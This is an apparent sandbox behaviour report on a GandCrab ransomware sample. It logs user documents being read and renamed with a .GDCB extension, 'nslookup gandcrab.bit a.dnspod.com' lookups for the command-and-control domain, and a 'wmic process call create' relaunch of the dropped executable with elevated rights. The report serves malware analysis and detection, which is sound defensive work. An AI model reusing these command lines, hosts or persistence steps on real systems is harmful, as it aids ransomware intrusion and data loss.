Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\y-GP 4d2ufj1t1Q8BO.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\y-GP 4d2ufj1t1Q8BO.xlsx, size = 1048576, size_out = 6571 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\y-GP 4d2ufj1t1Q8BO.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\y-GP 4d2ufj1t1Q8BO.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\eVSTo2lZP Wdy7GN.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\eVSTo2lZP Wdy7GN.doc, size = 1048576, size_out = 41731 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\eVSTo2lZP Wdy7GN.doc, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\eVSTo2lZP Wdy7GN.doc.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\mS4m0NY7CUhf.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\mS4m0NY7CUhf.docx, size = 1048576, size_out = 80284 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\mS4m0NY7CUhf.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\mS4m0NY7CUhf.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\yk_ykl4\2eXJAztyYmvvQ\XrBuw45rasubttu.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
For performance reasons, the remaining 841 entries are omitted.
The remaining entries can be found in glog.xml.
Process #5: nslookup.exe
(Host: 8, Network: 18)
+
Information Value
ID #5
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup gandcrab.bit a.dnspod.com
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:08, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:08:18
OS Process Information
+
Information Value
PID 0xba8
Parent PID 0x79c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B70
0x BDC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
nslookup.exe 0x00310000 0x00326fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x00000000007f0000 0x007f0000 0x047effff Pagefile Backed Memory - True False False
  • Region Actions
private_0x00000000047f0000 0x047f0000 0x0480ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000047f0000 0x047f0000 0x047fffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004800000 0x04800000 0x04803fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004810000 0x04810000 0x04811fff Private Memory Readable, Writable True False False
  • Region Actions
nslookup.exe.mui 0x04810000 0x04814fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000004820000 0x04820000 0x04833fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004840000 0x04840000 0x0487ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004880000 0x04880000 0x048bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000048c0000 0x048c0000 0x048c3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000048d0000 0x048d0000 0x048d0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000048e0000 0x048e0000 0x048e1fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000048f0000 0x048f0000 0x0492ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004930000 0x04930000 0x0496ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004970000 0x04970000 0x04970fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004980000 0x04980000 0x0498ffff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x04990000 0x04a4dfff Memory Mapped File Readable False False False
  • Region Actions
imm32.dll 0x04a50000 0x04a79fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004a50000 0x04a50000 0x04a50fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004b10000 0x04b10000 0x04c0ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004c10000 0x04c10000 0x04d97fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004da0000 0x04da0000 0x04daffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004db0000 0x04db0000 0x04f30fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004f40000 0x04f40000 0x0633ffff Pagefile Backed Memory Readable True False False
  • Region Actions
winrnr.dll 0x73640000 0x7364afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x73650000 0x73662fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x73670000 0x73685fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x73db0000 0x73dc1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x73dd0000 0x73e15fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x73e20000 0x73e27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x73e30000 0x73eb3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x73ec0000 0x73f0dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x73fc0000 0x73fc7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x73fd0000 0x73ffffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x74080000 0x7409afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007ef40000 0x7ef40000 0x7f03ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f040000 0x7f040000 0x7f062fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f064000 0x7f064000 0x7f064fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f069000 0x7f069000 0x7f06bfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f06c000 0x7f06c000 0x7f06efff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f06f000 0x7f06f000 0x7f06ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0xb70
(Host: 8, Network: 18)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x310000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = a.dnspod.com, address_out = 112.90.141.215 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 124 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 100 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #7: nslookup.exe
(Host: 8, Network: 18)
+
Information Value
ID #7
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup gandcrab.bit a.dnspod.com
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:23, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:08:03
OS Process Information
+
Information Value
PID 0x788
Parent PID 0x79c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 53C
0x B64
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
nslookup.exe 0x00310000 0x00326fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000c60000 0x00c60000 0x04c5ffff Pagefile Backed Memory - True False False
  • Region Actions
private_0x0000000004c60000 0x04c60000 0x04c7ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004c60000 0x04c60000 0x04c6ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004c70000 0x04c70000 0x04c73fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004c80000 0x04c80000 0x04c81fff Private Memory Readable, Writable True False False
  • Region Actions
nslookup.exe.mui 0x04c80000 0x04c84fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000004c90000 0x04c90000 0x04ca3fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004cb0000 0x04cb0000 0x04ceffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004cf0000 0x04cf0000 0x04d2ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004d30000 0x04d30000 0x04d33fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004d40000 0x04d40000 0x04d40fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004d50000 0x04d50000 0x04d51fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004d60000 0x04d60000 0x04d6ffff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x04d70000 0x04e2dfff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004e30000 0x04e30000 0x04e6ffff Private Memory Readable, Writable True False False
  • Region Actions
imm32.dll 0x04e70000 0x04e99fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004e70000 0x04e70000 0x04e70fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004e80000 0x04e80000 0x04e80fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004ea0000 0x04ea0000 0x04f9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004fa0000 0x04fa0000 0x04fdffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004fe0000 0x04fe0000 0x05167fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000051d0000 0x051d0000 0x051dffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000051e0000 0x051e0000 0x05360fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000005370000 0x05370000 0x0676ffff Pagefile Backed Memory Readable True False False
  • Region Actions
winrnr.dll 0x73640000 0x7364afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x73650000 0x73662fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x73670000 0x73685fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x73db0000 0x73dc1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x73dd0000 0x73e15fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x73e20000 0x73e27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x73e30000 0x73eb3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x73ec0000 0x73f0dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x73fc0000 0x73fc7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x73fd0000 0x73ffffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x74080000 0x7409afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007f650000 0x7f650000 0x7f74ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f750000 0x7f750000 0x7f772fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f776000 0x7f776000 0x7f778fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f779000 0x7f779000 0x7f779fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f77a000 0x7f77a000 0x7f77afff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f77d000 0x7f77d000 0x7f77ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0x53c
(Host: 8, Network: 18)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x310000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = a.dnspod.com, address_out = 112.90.141.215 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 124 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 100 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #9: wmic.exe
(Host: 15, Network: 0)
+
Information Value
ID #9
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:33, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:53
OS Process Information
+
Information Value
PID 0x784
Parent PID 0x79c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 134
0x 7AC
0x B9C
0x 248
0x 2C0
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000020000 0x00020000 0x0003ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00033fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000040000 0x00040000 0x00041fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000050000 0x00050000 0x00063fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False
  • Region Actions
